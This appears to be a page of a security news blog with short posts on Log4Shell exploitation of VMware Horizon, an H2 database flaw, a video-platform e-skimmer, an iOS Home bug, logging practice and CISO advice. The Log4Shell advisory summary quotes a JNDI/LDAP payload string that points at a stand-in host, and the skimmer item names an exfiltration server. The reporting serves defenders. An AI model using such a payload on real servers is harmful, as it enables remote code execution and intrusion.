Jan 08 2022

One Book Reveals the Future of the Chinese-American Conflict

Category: Cyber War,Digital cold war,Information Security,Information WarfareDISC @ 11:02 pm

In great-power competition, force is the coin of the realm. The Great Nightfall: Why We Must Win the New Cold War explains how. 

Ambassador Middendorf delivers a seminal book for understanding military competition in an era of great-power competition. No one who is serious about the future security, prosperity and freedom of America should neglect this essential read.

Ambassador Bill Middendorf makes one unambiguous argument in his new book, The Great Nightfall: Why We Must Win the New Cold War. America won’t survive and thrive in an era of great-power competition without a strong, dominant military. There is one reason for that. China.  

The Great Nightfall lays out the threat posed by the Chinese Communist Party. It also makes a compelling argument for the kind of military the U.S. needs to match the dangers posed by Beijing. 

Middendorf has given a full lifetime of service to the nation, from his days at sea during World War II to diplomatic assignments and government posts. Among the latter, a turn as Secretary of the Navy. He was instrumental in designing the naval forces that completely outmatched the Soviets during the Cold War. Today, he remains America’s maritime Henry Kissinger, the nation’s preeminent thinker on naval modernization. 

In The Great Nightfall, Middendorf deconstructs great-power competition. Regardless of how many internet trolls, little green men, bank accounts and businesses a state controls, it’s not enough to make the state a great power. That requires real military power. 

Without the capacity to physically defend national interests, big states are fat banks waiting to be robbed. In contrast, nations that can defend themselves have a foundation on which to build sustainable diplomatic, economic and political policies. “The Cold War ended,” Middendorf argues in The Great Nightfall, “because we were the strongest military force in the world, backed by a unified NATO and strong allies in the Pacific.”  

In short, in great-power competition, force is the coin of the realm. The problem with contemporary competition, Middendorf notes, is that “[t]imes have changed.” China is on a path to challenge the United States for number one.  

One of the attributes the great-power competition shares with the Cold War is that our adversaries would prefer to “win without fighting.” In other words, they want to achieve victory without the debilitating costs and risks of direct military conflict. These opponents are predisposed to adopt indirect approaches to whittle-away at the strength and solidarity of the free world. That said, military competition plays an important role in their calculus, particularly for China. Chinese strategy envisions ultimately demonstrating sufficient military dominance that Beijing can intimidate other nations and bend them to its will. 

In some ways, the new era of great-power competition resembles a new type of arms race. And, as was the case during the Cold War, there are concerns that the competition could turn into armed confrontation. Indeed, The Great Nightfall maps out several scenarios—from North Korea to the South China Seas—where great powers could actually come to blows. 

The Great Nightfall, however, is fundamentally a book about how the United States can establish conventional and strategic deterrence in the modern world. “This book is not a call for war,” writes the author. “The best way to prepare for war is to be prepared to win it. We need to stop underfunding the military, especially in areas of research, non-conventional war, space, cyberwar, and artificial intelligence. War is changing, and we need to change with it. We cannot expect success fighting tomorrow’s conflicts with yesterday’s weapons.”  

Middendorf’s blueprint for protecting America in the twenty-first century stands out in two ways. First, he provides a detailed assessment of how to protect the U.S. capacity to build and sustain a modern military. Here, he addresses issues from research and development, to establishing secure, “clean” supply chains, to ship-building. Second, he delivers a comprehensive overview of future U.S. naval needs.

It is not just his naval service and stint as Secretary of the Navy that lead the ambassador to focus on seapower. Fundamentally, China’s potential as a global threat is rooted in its ability to project maritime power. And naval power, in the modern sense, is multidimensional, linking the ability to sail the seas with undersea warfare, air, space, and cyber operations. 

The outstanding contribution of The Great Nightfall is its extraordinarily deep evaluation of all aspects of naval power, covering the nature of the Chinese threats and the appropriate countermeasures. In the end, Middendorf delivers a seminal book for understanding military competition in an era of great-power competition. No one who is serious about the future security, prosperity and freedom of America should neglect this essential read.  

Tags: Chinese-American Conflict, New Cold War, The Great Nightfall

Jan 08 2022

WireShark Cheat Sheet

Category: Cheat Sheet,Network securityDISC @ 11:08 am

Wireshark-cheatsheet-1Download

Learn Wireshark: Confidently navigate the Wireshark interface and solve real-world networking problems

Tags: WireShark Cheat Sheet

Jan 08 2022

Top 10 Facts Every CIO Should Know About Cloud in 2022

Category: Cloud computingDISC @ 10:22 am
Top 10 Facts Every CIO Should Know About Cloud in 2022

With great power comes great responsibility and CIOs (Chief Information Office) of an organization are no different. Technology is always changing, it is a very difficult job to keep up with the changes. CIOs are expected to be aware of and have a detailed understanding of major IT industry trends, new technologies, and IT best practices that could benefit the organization.

In the current scenario, cloud computing is dominating the market. So, what are the interesting cloud computing facts that every CIO is expected to be aware of in 2022? Did you know facts about cloud computing before landing here? Let’s discuss this in detail.

Table of Content

1. Your Company’s Cloud Business Objectives
2. DevOps Is the Way to Go for Cloud Success
3. Evolution of Hybrid Cloud
4. Workload Efficiency
5. Adhere to a Private Cloud or Public Cloud
6. Total Cost of Operating
7. Sustainability with Cloud
8. Scalability
9. Artificial Intelligence in Cloud
10. Cloud Migrations Will See Delays Due to Lack of Skills
CIO & Cloud_inner image_01
Image source: Teledata

Introduction to Cloud Computing

Tags: CIO, Cloud computing, cloud security, Introduction to Cloud Computing

Jan 08 2022

What it takes to Start a Career in InfoSec

Category: Cyber career,Information Security,InfoSec jobsDISC @ 9:55 am

 A useful advice from Cybersecurity Learning Saturday event. 
Cybersecurity Learning Saturday is a free program to help folks to build their professional careers. #cybersecurity #career #InfoSeccareer

What-it-takes-to-Start-a-Career-in-InfoSec-1Download

Finding Your Cybersecurity Career Path

Proven techniques and effective tips to help you advance in your cybersecurity career

InfoSec Jobs

Tags: #cybersecurity #career, Cybersecurity Career Master Plan, infosec career, InfoSec career path

Jan 07 2022

Data Security Best Practice

Category: data securityDISC @ 10:37 am

Data-Security-Best-Practice-1Download

Data and Goliath: The Hidden Battles to Collect Your Data and Control Your World

Tags: Data and Goliath, Data Security Best Practice

Jan 07 2022

Log4Shell-like security hole found in popular Java SQL database engine H2

Category: Log Management,Log4j,Security logsDISC @ 10:14 am
Log4Shell-like security hole found in popular Java SQL database engine H2

“It’s Log4Shell, Jim,” as Commander Spock never actually said, “But not as we know it.”

That’s the briefest summary we can come up with of the bug CVE-2021-42392, a security hole recently reported by researchers at software supply chain management company Jfrog.

This time, the bug isn’t in Apache’s beleagured Log4j toolkit, but can be found in a popular Java SQL server called the H2 Database Engine.

H2 isn’t like a traditional SQL system such as MySQL or Microsoft SQL server.

Although you can run H2 as a standalone server for other apps to connect into, its main claim to fame is its modest size and self-contained nature.

As a result, you can bundle the H2 SQL database code right into your own Java apps, and run your databases entirely in memory, with no need for separate server processes.

As with Log4j, of course, this means that you may have running instances of the H2 Database Engine code inside your organization without realizing it, if you use any apps or development components that themselves quietly include it.

JNDI back in the spotlight

I Survived Log4Shell 2021

Tags: Log4shell, SQL database engine H2

Jan 07 2022

Threat actor targets VMware Horizon servers using Log4Shell exploits, UK NHS warns

Category: Log4j,Security logsDISC @ 9:57 am
Threat actor targets VMware Horizon servers using Log4Shell exploits, UK NHS warns

The security team at the UK National Health Service (NHS) announced to have spotted threat actors exploiting the Log4Shell vulnerability to hack VMWare Horizon servers and install web shells.

“An unknown threat group has been observed targeting VMware Horizon servers running versions affected by Log4Shell vulnerabilities in order to establish persistence within affected networks.” reads the security advisory published by NHS.

“The attack likely consists of a reconnaissance phase, where the attacker uses theJava Naming and Directory InterfaceTM (JNDI) via Log4Shell payloads to call back to malicious infrastructure. Once a weakness has been identified, the attack then uses the Lightweight Directory Access Protocol (LDAP) to retrieve and execute a malicious Java class file that injects a web shell into the VM Blast Secure Gateway service.”

Once installed a web shell, threat actors can use it to carry out a broad range of malicious activities, such as deploying data exfiltration or deployment of ransomware.

In mid-December, experts reported that the Conti ransomware gang was the first professional group that leveraged Log4Shell exploit to compromise VMware vCenter Server installs. The ransomware group used the exploit to target internal devices that are not protected.

The CVE-2021-44228 flaw made the headlines in December, after Chinese security researcher p0rz9 publicly disclosed a Proof-of-concept exploit for the critical remote code execution zero-day vulnerability (aka Log4Shell) that affects the Apache Log4j Java-based logging library.

According to the NHS, threat actors are looking for unpatched VMWare Horizon servers to exploit the Log4Shell vulnerability.

The attackers employed a Log4Shell payload similar to ${jndi:ldap://example.com}, then launches a PowerShell command, spawned from ws_TomcatService.exe.

Log4Shell Nhs

When the attackers find a vulnerable server, they use the Lightweight Directory Access Protocol (LDAP) to retrieve and execute a malicious Java class file that injects a web shell into the VM Blast Secure Gateway service.

NHS recommends organizations to look for the following indicators of exploitation:

  • Evidence of ws_TomcatService.exe spawning abnormal processes
  • Any powershell.exe processes containing ‘VMBlastSG’ in the commandline
  • File modifications to ‘…\VMware\VMware View\Server\appblastgateway\lib\absg-worker.js’ – This file is generally overwritten during upgrades, and not modified

Affected organizations should review the VMware Horizon section of the VMware security advisory (VMSA-2021-0028) and apply security updates or mitigations as soon as possible.

Tags: Log4Shell exploits, VMware Horizon servers

Jan 06 2022

CISSP Study Guide

Category: CISSPDISC @ 10:54 am

CISSP-Study-Guide-1Download

Official (ISC)2® Guides

cissp-cheat-sheetDownload

👇 Please Follow our LI page…


DISC InfoSec

#InfoSecTools and #InfoSectraining

#InfoSecLatestTitles

#InfoSecServices

Tags: CISSP study guide

Jan 06 2022

A Deeper Dive Into the Value of Centralized Logging

Category: Log Management,Security logsDISC @ 10:34 am
A Deeper Dive Into the Value of Centralized Logging

let’s go a bit deeper and discuss some best practices regarding centralized logging and what other log files you can put in your security incident and event management (SIEM) server. Before I do, picture this scenario:It’s 11:00 p.m. Saturday night over the Labor Day weekend. Your helpdesk reported that the network is slow in New York City. That is very odd—no one is working Saturday in New York, Chicago, Los Angeles or in any of your offices.What is going on?

You haven’t yet implemented centralized logging or a SIEM tool, so you call the operations team (Ops) and alert them that something is going on in New York. You wait for them to get back to you. Thirty minutes pass; then you get a text back:Ops: Yes, there is a problem in New York. It is in the big video conference room on the 45th floor. Someone or something is flooding the network with traffic. The entire network in New York is crawling at a snail’s pace.Maybe a criminal is launching a ransomware attack.Maybe there is a denial-of-service (DOS) attack.Maybe the customer you hosted on Friday afternoon put a Raspberry Pi on the network in the conference room and has attacked the network.

What is going on?!

For you or your team to be able to answer this question quickly, you need to know what is happening on your network. You need centralized logging.

As you read this post, you might be thinking, “I can’t afford this, John!” and you’re probably right. Information security probably doesn’t have the budget for centralized logging just for the sake of information security. But once you have the logs in a central location, they can be used for other business purposes besides infosec.

OK, that makes more sense. How do you get started?

First, you want to follow best practices; namely, plan ahead and think it through. Planning and thinking through this kind of project will pay off on several fronts, not just for information security.

Here are some of the things to consider when you say to yourself, “I want centralized logging to improve my information security program.”

Step One: Make a plan and have a strategy for this project

Do not buy the first SIEM tool you find. Think about what data you want to collect. As part of this planning process you’ll ask questions of your network team and others including:

  • How big are the daily logs from the web servers, SQL, Oracle DBs, etc.?
  • What is our network traffic load like (Gigabytes of network logs? Terabytes of network logs)?
  • How many devices do we want (or need) to monitor (servers, switches, firewalls, wireless APs)?
  • From what other systems do we want to collect logs (antivirus, home-grown applications, VoIP traffic, printer logs, your Kubernetes farm, etc.)?
  • What kind of shop are you running? All Microsoft? All Linux? A hybrid?
  • Besides security monitoring, why are you logging all this information? Application troubleshooting? Customer support? Continuous improvement?

Step Two: Standardize

Before you purchase anything, make sure the structure of the logs you are collecting is consistent or can be made consistent in the tool.

You won’t be able to ingest logs from multiple data sources unless there is a consistent log format. Your network infrastructure devices will have a format—most likely syslog format—and your firewall(s) will likely have a similar format and then things can get proprietary (ugly, in other words). Remember, you are not just dumping data into a SQL server and then magically extracting useful information and meaningful insight into your network.

Step Three:  Keep all your network devices synchronized

This might seem obvious, but to be clear, you need to make sure the logs are all synced to the same time. All network devices and computer systems have a clock, so you will get the date and time for the events that you are logging. You want to use network time protocol (NTP) to sync all the systems to the same time source or you’ll have problems. Time is relative, sure, but for the purposes of logging events in a SIEM tool for troubleshooting, you need the clocks on your devices set to the same time and time zone.

If you have a switch (or two) that thinks it’s 1990 but you know it’s 2022, you are going to have a real tough time figuring out what happened Saturday night. It is easy for network devices and servers to get out of sync; you need them to be synchronized so that you know what happened at exactly what time.

Step Four: Ensure that each data source has unique identifiers

If you are searching through log data looking to see what happened Saturday night at 11:00 p.m. Eastern Daylight Time, make sure you know which switch is in the server room and which switch is in the big video conference room on the 45th floor. Here is an example of a switch log record; note the various fields and values that you want to be able to search and index.

Switch log record example from centralized logging.
Switch log record example.

You can see that this single log record has lots of information, but what switch did it come from? You need to be able to answer that question or all your time and effort will be wasted.

Step Five: Keep your production logs and centralized logs separate

This is, again, probably obvious; but to be clear: Your SIEM tool does not replace your SQL logs (or Oracle logs or other production logs). When you need to roll back transactions in SQL or Oracle, etc., you are going to use those production logs. The value of the SIEM tool is to gather insights about your network and servers and other devices. We are mainly focused on security insights (telemetry, correlation, etc.), but the same advice applies to troubleshooting a cranky application, investigating dropped VoIP calls or providing customer support.

“Hooray! Now I’m done!”

You’re not done yet.

“Wait—I’m not?”

Well, you’re more than halfway done. You’ve done the heavy lifting of getting your log data organized and centralized so that you can identify problems on your network when they happen. That is great! Now you get to use this new tool to get insight into what is happening on your network.

Flashback to the Labor Day incident and you can start to see how this tool can help you figure out what is happening.It’s 11:00 p.m. Saturday night over the Labor Day weekend. Your helpdesk reported that the network is slow in New York City. That is very odd—no one is working Saturday in New York, Chicago, Los Angeles or in any of your offices.What is going on?

You tell the helpdesk to put in a ticket to network operations about the slow network in New York. The Ops team opens up the SIEM tool and does a query. Sure enough, the switch in the conference room is blasting out a ton of bad packets. When they look a bit closer, they see the offender is an IoT device that has gone bad and is flooding the network with bad packets.

No other alerts have been triggered.

  • The firewall is not showing unusual activity out of New York or anywhere else.
  • The database servers are humming along fine in the server room.
  • The only problem is that one switch in the conference room.
  • It’s not ransomware; you’re not under attack.
  • You don’t have to call the CEO or the CFO about a possible ransomware attack.

The Ops team shuts off the port on the switch, traffic returns to normal and the event is logged in the ticketing system. A ticket has been opened for a support person in New York to replace the bad IoT device first thing Tuesday morning.

Mystery solved, crisis averted—and you can chalk up that win to using the SIEM tool to identify the offending switch. That is #Winning.

Guide to Computer Security Log Management : Recommendations of the National Institute of Standards and Technology

Guide to Computer Security Log Management

Tags: Centralized Logging

Jan 06 2022

Apple Home software bug could lock you out of your iPhone

Category: Mobile SecurityDISC @ 10:14 am
Apple Home software bug could lock you out of your iPhone

A security research called Trevor Spiniolas has just published information about a bug he claims has existed in Apple’s iOS operating system since at least version 14.7.

The bug affects the Home app, Apple’s home automation software that lets you control home devices – webcams, doorbells, thermostats, light bulbs, and so on – that support Apple’s HomeKit ecosystem.

Spiniolas has dubbed the bug doorLock, giving it both a logo and a dedicated web page, claiming that although he disclosed it to Apple back in August 2021, the company’s attempts to patch it so far have been incomplete, and his specified deadline of 01 January 2022 for “going live” with details of the flaw has now passed:

I believe this bug is being handled inappropriately as it poses a serious risk to users and many months have passed without a comprehensive fix. The public should be aware of this vulnerability and how to prevent it from being exploited, rather than being kept in the dark.

You’ll have to make your own mind up about whether this bug truly “poses a serious risk”, but in this article we’ll tell you how to deal with the issue anyway.

The good news is that the bug doesn’t let attackers spy on your phone (or your HomeKit devices), steal data such as passwords or personal messages, install malware, rack up fraudulent online charges, or mess with your network.

Also, there are some easy ways to avoid getting bitten by this bug in the first place while you wait for Apple to come up with a complete fix.

The bad news is that if an attacker does trick you into triggering the bug, you could end up with a phone that’s so unresponsive that you have to do a firmware reset to get back into the device.

And, as you probably already knew – or, if you didn’t, you know now! – using Device Recovery or DFU (a direct firmware update, where you completely reinitialise the firmware of a recalcitrant iDevice over a USB cable) automatically wipes out all your personal data first.

Which devices are affected?

Spiniolas doesn’t say, but we’re assuming that this same bug is present in iPadOS, which has shipped separately from iOS since version 13, though always with a matching version number.

We also don’t know how far back this bug goes: as mentioned above, Spiniolas says “from iOS 14.7”, which we’re guessing is the earliest version he’s been able to test.

Apple doesn’t allow iPhones and iPads to be downgraded, as a way of preventing would-be jailbreakers from reverting to known-buggy iOS versions in order to reintroduce exploitable security holes on purpose.

iOS Application Security

Tags: iOS Application Security, iPhone, Software Bugs

Jan 05 2022

CISO guide to bolstering cyber defenses

Category: CISO,Information Security,vCISODISC @ 9:27 am

CISO-guide-to-bolstering-cyber-defenses-1Download
CISO-mind-mapDownload

Why CIOs Should Report to CISOs – If the CISO is responsible for the security of the organization, then that same person also should be responsible for both security and IT infrastructure.

CISO Desk Reference Guide: A Practical Guide for CISOs

Tags: CISO, CISO guide

Jan 05 2022

How can SMBs extend their SecOps capabilities without adding headcount?

Category: Security Operations CenterDISC @ 9:08 am
How can SMBs extend their SecOps capabilities without adding headcount?

Outsourcing security: What’s on offer?

Fortunately, there is an alternative way for procuring security expertise: by retaining the services of managed security service providers (MSSPs) and managed detection and response (MDR) providers.

MSSPs usually assist organizations’ IT departments in managing the IT infrastructure and keeping it secure by managing security equipment/systems, monitoring security logs, supervising patch management, and similar preventative security measures. MDR providers concentrate on monitoring network traffic and data, providing threat hunting/detection services and responding to discovered threats – capabilities that are difficult for most SMBs to cultivate in-house due to resource limitations.

For example, when the existence of the Log4Shell vulnerability and a PoC for it was revealed, Milton Security, a California-based MDR provider, has been inundated with concerns and requests from customers, prospects, and the public asking to help make sense of the situation, provide credible and timely updates, and monitor networks for any suspicious activity that might be related to Log4j exploitation.

But they have also been getting a lot of requests for their application security testing, penetration testing, incident response, and even their vCISO service.

Winning the perpetual fight against crime by building a modern Security Operations Center (SOC)

Tags: SecOps, SOC

Jan 05 2022

Researchers used electromagnetic signals to classify malware infecting IoT devices

Category: MalwareDISC @ 8:58 am
Researchers used electromagnetic signals to classify malware infecting IoT devices

A team of academics (Duy-Phuc Pham, Damien Marion, Matthieu Mastio and Annelie Heuser) from the Research Institute of Computer Science and Random Systems (IRISA) have devised a new approach that analyzes electromagnetic field emanations from the Internet of Things (IoT) devices to detect highly evasive malware.

The team of experts presented their technique at the Annual Computer Security Applications Conference (ACSAC) that took place in December.

The Internet of Things (IoT) devices are privileged targets of threat actors due to the lack of security requirements and the numerous customized firmware and hardware that make it difficult to propose a standardized approach to cyber security.

The researchers proposed a novel approach of using side channel information to identify malware targeting IoT systems. The technique could allow analysts to determine malware type and identity, even when the malicious code is heavily obfuscated to prevent static or symbolic binary analysis. 

“In this paper, we concentrate on the ElectroMagnetic (EM) field of an embedded device as a source for malware analysis, which offers several advantages. In fact, EM emanation that is measured from the device is practically undetectable by the malware. Therefore, malware evasion techniques cannot be straightforwardly applied unlike for dynamic software monitoring.” reads a research paper published by the experts. “Also, since a malware does not have control on outside hardware-level events (e.g. on EM emanation, heat dissipation), a protection system relying on hardware features cannot be taken down, even if the malware owns the maximum privilege on the machine. Therefore, with EM emanation it becomes possible to detect stealthy malware (e.g. kernel-level rootkits), which are able to prevent software-based analysis methods.”

Experts pointed out that the approach does not require modifications on the target devices.

“We monitor the Raspberry Pi under the execution of benign and malicious dataset using a low to mid-range measurement setup. It consists of an oscilloscope with 1GHz bandwidth (Picoscope 6407) connected to a H-Field Probe (Langer RF-R 0.3-3), where the EM signal is amplified using a Langer PA-303 +30dB.” continues the paper. “To capture long-time execution of malware in the wild, the signals were sampled at 2MHz sampling rate.”

The team analyzed power side-channel signals using Convolution Neural Networks (CNN) to detect malicious activities on IoT devices.

The collected data is very noisy for this reason the researchers needed a preprocessing step to isolate relevant informative signals. This relevant data was used to train neural network models and machine learning algorithms to classify malware types, binaries, obfuscation methods, and detect the use of packers.

The academics collected 3 000 traces each for 30 malware binaries and 10 000 traces for benign activity. They recorded 100,000 measurement traces from an IoT device that was infected by various strains of malware and realistic benign activity. 

The test conducted by the researchers demonstrated that they were able to predict three generic malware types (and one benign class) with an accuracy of 99.82%.

Electromagnetic Signals for Obfuscated Malware Classification

“We have demonstrated in this paper that by using simple neural network models, it is possible to gain considerable information about the state of a monitored device, by observing solely its EM emanations. We were indeed able to not only detect, but also determine the type of real-world malware infecting a Raspberry Pi running a full Linux OS, with an accuracy of 99.89% on a test dataset including 20 000 traces from 30 different malware samples (and five different benign activities).” concludes the paper.” We demonstrated that software obfuscation techniques do not hinder our classification approach, even if the obfuscation technique was not known to the analyst before.”

Feature Hierarchy Mining for Malware Classification

Tags: electromagnetic signals

Jan 04 2022

NetCat for PenTester

Category: Pen TestDISC @ 4:03 pm

Netcat-for-pentester-1-1Download

Penetration Testing: Step By Step Guide

Tags: Netcat, Penetration Testing

Jan 04 2022

App security by design

Category: App SecurityDISC @ 10:56 am

Application-Security-by-Design-1Download

Securing DevOps: Security in the Cloud

Tags: App security by design, Securing DevOps

Jan 04 2022

List of data breaches and cyber attacks in December 2021 – 219 million records breached

Category: Cyber Attack,Data Breach,data security,Information SecurityDISC @ 10:35 am
List of data breaches and cyber attacks in December 2021 – 219 million records breached

List of data breaches and cyber attacks in December 2021 – 219 million records breached

Luke Irwin  4th January 2022

2021 was a difficult year many of us, and with the hope that COVID-19 will dissipate in the spring, this is a new year more than any other where we want to look forwards, not backwards.

But before we turn our attention to 2022, we must first round out 2021 with our final monthly review of data breaches and cyber attacks. December saw 74 publicly disclosed security incidents, which accounted for 219,310,808 breached records.

You can find the full list of incidents below, with those affecting UK-based organisations listed in bold.

Additionally, we’ll also soon be publishing our latest quarterly review of security incidents, in which you can discover the latest trends and take a look back at the year as a whole.

Contents

Big Breaches: Cybersecurity Lessons for Everyone

Tags: Big Breaches, cyber attacks, data breaches

Jan 04 2022

Attackers abused cloud video platform to inject an e-skimmer into 100 Real Estate sites

Category: pci dssDISC @ 10:24 am
Attackers abused cloud video platform to inject an e-skimmer into 100 Real Estate sites

Threat actors used an unnamed cloud video platform to install an e-skimmer on more than 100 real estate websites belonging to the same parent company.

In e-skimming attacks, attackers inject malicious JavaScript code into e-stores to financial data while visitors are purchasing products. Researchers from Palo Alto Networks documented a supply chain attack in which the attackers abused a cloud video platform to inject an e-skimmer hidden into video.

Every website importing the video from the platform was compromised due to the presence of the e-skimmer.

“With Palo Alto Networks proactive monitoring and detection services, we detected over 100 real estate sites that were compromised by the same skimmer attack.” reads the analysis published by Palo Alto Networks. “After analysis of the sites we identified, we found that all the compromised sites belong to one parent company. All these compromised sites are importing the same video (accompanied by malicious scripts) from a cloud video platform.”

The security firm helped the cloud video platform and the real estate firm in removing the e-skimmer.

The researchers have discovered that the cloud video platform allows users to create their players that could be customized by adding JavaScript code. The JavaScript customizations could be included in a file that is uploaded to the platform.

“In this specific instance, the user uploaded a script that could be modified upstream to include malicious content.We infer that the attacker altered the static script at its hosted location by attaching skimmer code. Upon the next player update, the video platform re-ingested the compromised file and served it along with the impacted player.” continues the analysis.

The attackers were able to modify the static script at its hosted location by attaching e-skimmer code. By updating the player update, the video platform provided the compromised file and served it along with the customized player.

The software skimmer is highly polymorphic and elusive, experts pointed out that it is continuously updated by the authors.

e-skimmer

The e-skimmer allows attackers to gather sensitive and financial information, including names, emails, phone numbers, and credit cards data.

Stolen data were uploaded to the server https://cdn-imgcloud[.]com/img.

The researchers shared Indicators of Compromise (IoCs) for these attacks.

“The skimmer itself is highly polymorphic, elusive and continuously evolving. When combined with cloud distribution platforms, the impact of a skimmer of this type could be very large,” Palo Alto Networks concludes.

RFID Blocking Sleeves, Set With Color Coding. Identity Theft Prevention RFID Credit Card Holders by Boxiki Travel (Set of 12 Credit Card Protectors + 3 Passport Holders)

Tags: Credit Card Skimmer, e-skimmer, skimmer

Jan 03 2022

A CISO’s guide to discussing cybersecurity with the board

Category: CISO,vCISODISC @ 5:23 pm
A CISO’s guide to discussing cybersecurity with the board

To get the assets needed for CISOs to properly do their jobs, business leaders need to invest time, attention, and money in cybersecurity. Here are helpful ways that CISOs can discuss cybersecurity with their C-suite and board members.

Work your way to the table

As a newer role within organizations, CISOs may not yet be understood by leadership teams or have a seat at the executive table. Some CISOs may also be managed by other IT leaders such as a CIO and CTO, making it difficult to build trust among the rest of the C-suite and board. Even if you have a good relationship with your supervisors, some of the messaging might change as it goes through the chain of command.

It’s frustrating to not have a seat at the table, but there are other ways to be heard.

One way is to start building relationships with other members of leadership. You can try meeting one-on-one with business shareholders to share ideas, enjoy informal conversations or identify an ally.

In my own companies, I encourage these types of meetings. When team members want to run ideas by me, I’m happy to listen — regardless of their titles. If they bring in some good thoughts, I usually think them over and may follow up if the employees present compelling ideas. Building this trust may lead to me bringing these ideas to the board or even inviting the employees to present themselves.

Of course, it’s ideal to always have a seat at the table, but if that’s not possible, work your way up. Anyone can make an impact, but you must put yourself out there and build trust with your leadership.

Focus your message

When you get a chance to speak with executives, you typically don’t have much time to discuss details. And frankly, that’s not what executives are looking for, anyway. It’s important to phrase cybersecurity conversations in a way that resonates with the leaders.

Messaging starts with understanding the C-suite and boards’ priorities. Usually, they are interested in big picture initiatives, so explain why cyber investment is critical to the success of these initiatives. For example, if the CEO wants to increase total revenue by 5% in the next year, explain how they can prevent major unnecessary losses from a cyber attack with an investment in cybersecurity.

Once you know the executive team and board’s goals, look to specific members, and identify a potential ally. Has one team recently had a workplace security breach? Does one leader have a difficult time getting his or her team to understand the makings of a phishing scheme? These interests and experiences can help guide the explanation of the security solution.

Lose the tech jargon

If you’re a CISO, you’re well-versed in cybersecurity, but remember that not everyone is as involved in the subject as you are, and business leaders probably will not understand technical jargon. Conversations leading with highly technical terms are unlikely to kindle and keep a C-suite or board member’s attention.

CISOs are the translators that explain cybersecurity needs to leadership in a way they understand — through real-life examples and business metrics outlining risk. If you speak their language, executive leaders will be more willing to consider a proposal.

There’s more to being a CISO than keeping track of evolving risks and staying up to date on technological advancements. You are also an advocate for cybersecurity initiatives that protect the company, convincing executives to invest in cybersecurity. Working up to the board room might not be easy, but with clear and relevant messaging, you can be a champion for a strong cybersecurity strategy.

Information Security Governance: Framework and Toolset for CISOs and Decision Makers

Tags: CISO

Jan 03 2022

Critical Log Review Checklist For Security Incidents

Category: Log Management,Security logsDISC @ 12:32 pm

Critical Log Review Checklist For Security Incidents – by SANS Institute

No alternative text description for this image


Guide to Computer Security Log Management : Recommendations of the National Institute of Standards and Technology

Guide to Computer Security Log Management

Tags: Critical Log Review

Jan 03 2022

SEGA Europe left AWS S3 bucket unsecured exposing data and infrastructure to attack

Category: AWS Security,Cloud computingDISC @ 10:43 am
SEGA Europe left AWS S3 bucket unsecured exposing data and infrastructure to attack

At the end of the year, gaming giant SEGA Europe inadvertently left users’ personal information publicly accessible on Amazon Web Services (AWS) S3 bucket, cybersecurity firm VPN Overview reported.

The unsecured S3 bucket contained multiple sets of AWS keys that could have allowed threat actors to access many of SEGA Europe’s cloud services along withMailChimp and Steam keys that allowed access to those services. in SEGA’s name.

“Researchers found compromised SNS notification queues and were able to run scripts and upload files on domains owned by SEGA Europe. Several popular SEGA websites and CDNs were affected.” reads the report published by VPN Overview.

sega vulnerabilities-hack-infographic-updated 2

The unsecured S3 bucket could potentially also grant access to user data, including information on hundreds of thousands of users of the Football Manager forums at community.sigames.com.

Below is the list of bugs in SEGA Europe’s Amazon cloud reported by the company:

FINDINGSEVERITY
Steam developer keyModerate
RSA keysSerious
PII and hashed passwordsSerious
MailChimp API keyCritical
Amazon Web Services credentialsCritical

Set up a virtual lab and pentest major AWS services, including EC2, S3, Lambda, and CloudFormation

Tags: AWS S3 bucket unsecured

« Previous PageNext Page »